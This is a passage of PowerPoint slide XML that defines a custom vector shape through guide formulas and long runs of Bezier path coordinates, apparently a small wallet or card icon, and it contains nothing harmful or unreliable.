          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4907133" y="3237923"/>
            <a:ext cx="588886" cy="436916"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 56 w 144"/>
              <a:gd name="T1" fmla="*/ 10 h 107"/>
              <a:gd name="T2" fmla="*/ 0 w 144"/>
              <a:gd name="T3" fmla="*/ 92 h 107"/>
              <a:gd name="T4" fmla="*/ 104 w 144"/>
              <a:gd name="T5" fmla="*/ 92 h 107"/>
              <a:gd name="T6" fmla="*/ 131 w 144"/>
              <a:gd name="T7" fmla="*/ 78 h 107"/>
              <a:gd name="T8" fmla="*/ 4 w 144"/>
              <a:gd name="T9" fmla="*/ 92 h 107"/>
              <a:gd name="T10" fmla="*/ 127 w 144"/>
              <a:gd name="T11" fmla="*/ 77 h 107"/>
              <a:gd name="T12" fmla="*/ 106 w 144"/>
              <a:gd name="T13" fmla="*/ 52 h 107"/>
              <a:gd name="T14" fmla="*/ 105 w 144"/>
              <a:gd name="T15" fmla="*/ 50 h 107"/>
              <a:gd name="T16" fmla="*/ 104 w 144"/>
              <a:gd name="T17" fmla="*/ 43 h 107"/>
              <a:gd name="T18" fmla="*/ 133 w 144"/>
              <a:gd name="T19" fmla="*/ 24 h 107"/>
              <a:gd name="T20" fmla="*/ 109 w 144"/>
              <a:gd name="T21" fmla="*/ 51 h 107"/>
              <a:gd name="T22" fmla="*/ 108 w 144"/>
              <a:gd name="T23" fmla="*/ 53 h 107"/>
              <a:gd name="T24" fmla="*/ 115 w 144"/>
              <a:gd name="T25" fmla="*/ 55 h 107"/>
              <a:gd name="T26" fmla="*/ 117 w 144"/>
              <a:gd name="T27" fmla="*/ 52 h 107"/>
              <a:gd name="T28" fmla="*/ 118 w 144"/>
              <a:gd name="T29" fmla="*/ 56 h 107"/>
              <a:gd name="T30" fmla="*/ 119 w 144"/>
              <a:gd name="T31" fmla="*/ 55 h 107"/>
              <a:gd name="T32" fmla="*/ 118 w 144"/>
              <a:gd name="T33" fmla="*/ 55 h 107"/>
              <a:gd name="T34" fmla="*/ 122 w 144"/>
              <a:gd name="T35" fmla="*/ 57 h 107"/>
              <a:gd name="T36" fmla="*/ 121 w 144"/>
              <a:gd name="T37" fmla="*/ 56 h 107"/>
              <a:gd name="T38" fmla="*/ 125 w 144"/>
              <a:gd name="T39" fmla="*/ 59 h 107"/>
              <a:gd name="T40" fmla="*/ 124 w 144"/>
              <a:gd name="T41" fmla="*/ 57 h 107"/>
              <a:gd name="T42" fmla="*/ 64 w 144"/>
              <a:gd name="T43" fmla="*/ 85 h 107"/>
              <a:gd name="T44" fmla="*/ 21 w 144"/>
              <a:gd name="T45" fmla="*/ 72 h 107"/>
              <a:gd name="T46" fmla="*/ 20 w 144"/>
              <a:gd name="T47" fmla="*/ 70 h 107"/>
              <a:gd name="T48" fmla="*/ 23 w 144"/>
              <a:gd name="T49" fmla="*/ 72 h 107"/>
              <a:gd name="T50" fmla="*/ 23 w 144"/>
              <a:gd name="T51" fmla="*/ 71 h 107"/>
              <a:gd name="T52" fmla="*/ 26 w 144"/>
              <a:gd name="T53" fmla="*/ 72 h 107"/>
              <a:gd name="T54" fmla="*/ 28 w 144"/>
              <a:gd name="T55" fmla="*/ 69 h 107"/>
              <a:gd name="T56" fmla="*/ 28 w 144"/>
              <a:gd name="T57" fmla="*/ 70 h 107"/>
              <a:gd name="T58" fmla="*/ 27 w 144"/>
              <a:gd name="T59" fmla="*/ 72 h 107"/>
              <a:gd name="T60" fmla="*/ 33 w 144"/>
              <a:gd name="T61" fmla="*/ 73 h 107"/>
              <a:gd name="T62" fmla="*/ 30 w 144"/>
              <a:gd name="T63" fmla="*/ 72 h 107"/>
              <a:gd name="T64" fmla="*/ 42 w 144"/>
              <a:gd name="T65" fmla="*/ 70 h 107"/>
              <a:gd name="T66" fmla="*/ 41 w 144"/>
              <a:gd name="T67" fmla="*/ 70 h 107"/>
              <a:gd name="T68" fmla="*/ 45 w 144"/>
              <a:gd name="T69" fmla="*/ 69 h 107"/>
              <a:gd name="T70" fmla="*/ 43 w 144"/>
              <a:gd name="T71" fmla="*/ 72 h 107"/>
              <a:gd name="T72" fmla="*/ 49 w 144"/>
              <a:gd name="T73" fmla="*/ 70 h 107"/>
              <a:gd name="T74" fmla="*/ 49 w 144"/>
              <a:gd name="T75" fmla="*/ 69 h 107"/>
              <a:gd name="T76" fmla="*/ 50 w 144"/>
              <a:gd name="T77" fmla="*/ 72 h 107"/>
              <a:gd name="T78" fmla="*/ 51 w 144"/>
              <a:gd name="T79" fmla="*/ 71 h 107"/>
              <a:gd name="T80" fmla="*/ 53 w 144"/>
              <a:gd name="T81" fmla="*/ 71 h 107"/>
              <a:gd name="T82" fmla="*/ 60 w 144"/>
              <a:gd name="T83" fmla="*/ 70 h 107"/>
              <a:gd name="T84" fmla="*/ 60 w 144"/>
              <a:gd name="T85" fmla="*/ 69 h 107"/>
              <a:gd name="T86" fmla="*/ 60 w 144"/>
              <a:gd name="T87" fmla="*/ 72 h 107"/>
              <a:gd name="T88" fmla="*/ 64 w 144"/>
              <a:gd name="T89" fmla="*/ 70 h 107"/>
              <a:gd name="T90" fmla="*/ 63 w 144"/>
              <a:gd name="T91" fmla="*/ 71 h 107"/>
              <a:gd name="T92" fmla="*/ 64 w 144"/>
              <a:gd name="T93" fmla="*/ 71 h 107"/>
              <a:gd name="T94" fmla="*/ 67 w 144"/>
              <a:gd name="T95" fmla="*/ 70 h 107"/>
              <a:gd name="T96" fmla="*/ 69 w 144"/>
              <a:gd name="T97" fmla="*/ 72 h 107"/>
              <a:gd name="T98" fmla="*/ 71 w 144"/>
              <a:gd name="T99" fmla="*/ 70 h 107"/>
              <a:gd name="T100" fmla="*/ 73 w 144"/>
              <a:gd name="T101" fmla="*/ 70 h 107"/>
              <a:gd name="T102" fmla="*/ 79 w 144"/>
              <a:gd name="T103" fmla="*/ 73 h 107"/>
              <a:gd name="T104" fmla="*/ 80 w 144"/>
              <a:gd name="T105" fmla="*/ 72 h 107"/>
              <a:gd name="T106" fmla="*/ 83 w 144"/>
              <a:gd name="T107" fmla="*/ 72 h 107"/>
              <a:gd name="T108" fmla="*/ 84 w 144"/>
              <a:gd name="T109" fmla="*/ 72 h 107"/>
              <a:gd name="T110" fmla="*/ 83 w 144"/>
              <a:gd name="T111" fmla="*/ 72 h 107"/>
              <a:gd name="T112" fmla="*/ 88 w 144"/>
              <a:gd name="T113" fmla="*/ 73 h 107"/>
              <a:gd name="T114" fmla="*/ 87 w 144"/>
              <a:gd name="T115" fmla="*/ 72 h 107"/>
              <a:gd name="T116" fmla="*/ 91 w 144"/>
              <a:gd name="T117" fmla="*/ 73 h 107"/>
              <a:gd name="T118" fmla="*/ 91 w 144"/>
              <a:gd name="T119" fmla="*/ 69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44" h="107">
                <a:moveTo>
                  <a:pt x="142" y="26"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="26"/>
                  <a:pt x="142" y="26"/>
                  <a:pt x="142" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141" y="23"/>
                  <a:pt x="138" y="21"/>
                  <a:pt x="135" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="20"/>
                  <a:pt x="135" y="20"/>
                  <a:pt x="135" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="20"/>
                  <a:pt x="135" y="20"/>
                  <a:pt x="135" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="1"/>
                  <a:pt x="73" y="1"/>
                  <a:pt x="73" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="1"/>
                  <a:pt x="73" y="1"/>
                  <a:pt x="73" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="0"/>
                  <a:pt x="66" y="1"/>
                  <a:pt x="63" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="4"/>
                  <a:pt x="58" y="7"/>
                  <a:pt x="56" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="10"/>
                  <a:pt x="56" y="10"/>
                  <a:pt x="56" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="10"/>
                  <a:pt x="56" y="10"/>
                  <a:pt x="56" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="28"/>
                  <a:pt x="51" y="28"/>
                  <a:pt x="51" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                  <a:pt x="15" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="28"/>
                  <a:pt x="7" y="29"/>
                  <a:pt x="4" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="35"/>
                  <a:pt x="0" y="39"/>
                  <a:pt x="0" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="43"/>
                  <a:pt x="0" y="43"/>
                  <a:pt x="0" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="43"/>
                  <a:pt x="0" y="43"/>
                  <a:pt x="0" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                  <a:pt x="0" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="96"/>
                  <a:pt x="2" y="100"/>
                  <a:pt x="4" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="106"/>
                  <a:pt x="11" y="107"/>
                  <a:pt x="15" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                  <a:pt x="15" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                  <a:pt x="89" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="107"/>
                  <a:pt x="97" y="106"/>
                  <a:pt x="100" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="100"/>
                  <a:pt x="104" y="96"/>
                  <a:pt x="104" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                  <a:pt x="104" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="83"/>
                  <a:pt x="104" y="83"/>
                  <a:pt x="104" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                  <a:pt x="114" y="86"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="88"/>
                  <a:pt x="121" y="87"/>
                  <a:pt x="124" y="86"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="84"/>
                  <a:pt x="130" y="81"/>
                  <a:pt x="131" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                  <a:pt x="131" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="36"/>
                  <a:pt x="143" y="36"/>
                  <a:pt x="143" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="36"/>
                  <a:pt x="143" y="36"/>
                  <a:pt x="143" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="33"/>
                  <a:pt x="144" y="29"/>
                  <a:pt x="142" y="26"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="56" y="26"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="28"/>
                  <a:pt x="61" y="28"/>
                  <a:pt x="61" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="28"/>
                  <a:pt x="55" y="28"/>
                  <a:pt x="55" y="28"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56" y="26"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="100" y="92"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="98"/>
                  <a:pt x="95" y="103"/>
                  <a:pt x="89" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="103"/>
                  <a:pt x="15" y="103"/>
                  <a:pt x="15" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="103"/>
                  <a:pt x="4" y="98"/>
                  <a:pt x="4" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="61"/>
                  <a:pt x="4" y="61"/>
                  <a:pt x="4" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="61"/>
                  <a:pt x="100" y="61"/>
                  <a:pt x="100" y="61"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="100" y="92"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="100" y="48"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="48"/>
                  <a:pt x="4" y="48"/>
                  <a:pt x="4" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="43"/>
                  <a:pt x="4" y="43"/>
                  <a:pt x="4" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="37"/>
                  <a:pt x="9" y="32"/>
                  <a:pt x="15" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="32"/>
                  <a:pt x="89" y="32"/>
                  <a:pt x="89" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="32"/>
                  <a:pt x="100" y="37"/>
                  <a:pt x="100" y="43"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="100" y="48"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="127" y="77"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="82"/>
                  <a:pt x="120" y="84"/>
                  <a:pt x="115" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="79"/>
                  <a:pt x="104" y="79"/>
                  <a:pt x="104" y="79"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="73"/>
                  <a:pt x="104" y="73"/>
                  <a:pt x="104" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="78"/>
                  <a:pt x="118" y="78"/>
                  <a:pt x="118" y="78"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="68"/>
                  <a:pt x="121" y="68"/>
                  <a:pt x="121" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="63"/>
                  <a:pt x="104" y="63"/>
                  <a:pt x="104" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="52"/>
                  <a:pt x="104" y="52"/>
                  <a:pt x="104" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="53"/>
                  <a:pt x="107" y="53"/>
                  <a:pt x="107" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="52"/>
                  <a:pt x="107" y="52"/>
                  <a:pt x="107" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="52"/>
                  <a:pt x="107" y="52"/>
                  <a:pt x="107" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="52"/>
                  <a:pt x="107" y="52"/>
                  <a:pt x="106" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="52"/>
                  <a:pt x="106" y="52"/>
                  <a:pt x="106" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="52"/>
                  <a:pt x="105" y="52"/>
                  <a:pt x="105" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="51"/>
                  <a:pt x="106" y="51"/>
                  <a:pt x="106" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="51"/>
                  <a:pt x="107" y="51"/>
                  <a:pt x="107" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="51"/>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="49"/>
                  <a:pt x="107" y="49"/>
                  <a:pt x="106" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="49"/>
                  <a:pt x="106" y="49"/>
                  <a:pt x="106" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="49"/>
                  <a:pt x="105" y="49"/>
                  <a:pt x="105" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="49"/>
                  <a:pt x="105" y="49"/>
                  <a:pt x="105" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="49"/>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="50"/>
                  <a:pt x="105" y="50"/>
                  <a:pt x="106" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="50"/>
                  <a:pt x="106" y="49"/>
                  <a:pt x="106" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="49"/>
                  <a:pt x="106" y="49"/>
                  <a:pt x="106" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="49"/>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                  <a:pt x="107" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="51"/>
                  <a:pt x="106" y="51"/>
                  <a:pt x="104" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="52"/>
                  <a:pt x="104" y="52"/>
                  <a:pt x="104" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                  <a:pt x="104" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="42"/>
                  <a:pt x="104" y="41"/>
                  <a:pt x="104" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="50"/>
                  <a:pt x="135" y="50"/>
                  <a:pt x="135" y="50"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127" y="77"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="140" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="138" y="40"/>
                  <a:pt x="138" y="40"/>
                  <a:pt x="138" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="16"/>
                  <a:pt x="59" y="16"/>
                  <a:pt x="59" y="16"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="11"/>
                  <a:pt x="60" y="11"/>
                  <a:pt x="60" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="6"/>
                  <a:pt x="67" y="3"/>
                  <a:pt x="72" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="24"/>
                  <a:pt x="133" y="24"/>
                  <a:pt x="133" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138" y="25"/>
                  <a:pt x="141" y="30"/>
                  <a:pt x="140" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="110" y="54"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="53"/>
                  <a:pt x="107" y="53"/>
                  <a:pt x="107" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="52"/>
                  <a:pt x="108" y="52"/>
                  <a:pt x="108" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="52"/>
                  <a:pt x="109" y="52"/>
                  <a:pt x="110" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="50"/>
                  <a:pt x="109" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="51"/>
                  <a:pt x="109" y="51"/>
                  <a:pt x="109" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="51"/>
                  <a:pt x="108" y="51"/>
                  <a:pt x="108" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="51"/>
                  <a:pt x="108" y="51"/>
                  <a:pt x="108" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="51"/>
                  <a:pt x="108" y="50"/>
                  <a:pt x="108" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="50"/>
                  <a:pt x="108" y="50"/>
                  <a:pt x="108" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="50"/>
                  <a:pt x="109" y="50"/>
                  <a:pt x="110" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="50"/>
                  <a:pt x="110" y="50"/>
                  <a:pt x="110" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="51"/>
                  <a:pt x="111" y="51"/>
                  <a:pt x="111" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="51"/>
                  <a:pt x="110" y="52"/>
                  <a:pt x="110" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="52"/>
                  <a:pt x="110" y="52"/>
                  <a:pt x="110" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="52"/>
                  <a:pt x="109" y="52"/>
                  <a:pt x="108" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="53"/>
                  <a:pt x="109" y="53"/>
                  <a:pt x="109" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                  <a:pt x="110" y="53"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110" y="54"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="115" y="55"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="56"/>
                  <a:pt x="116" y="56"/>
                  <a:pt x="116" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="56"/>
                  <a:pt x="116" y="56"/>
                  <a:pt x="116" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="56"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
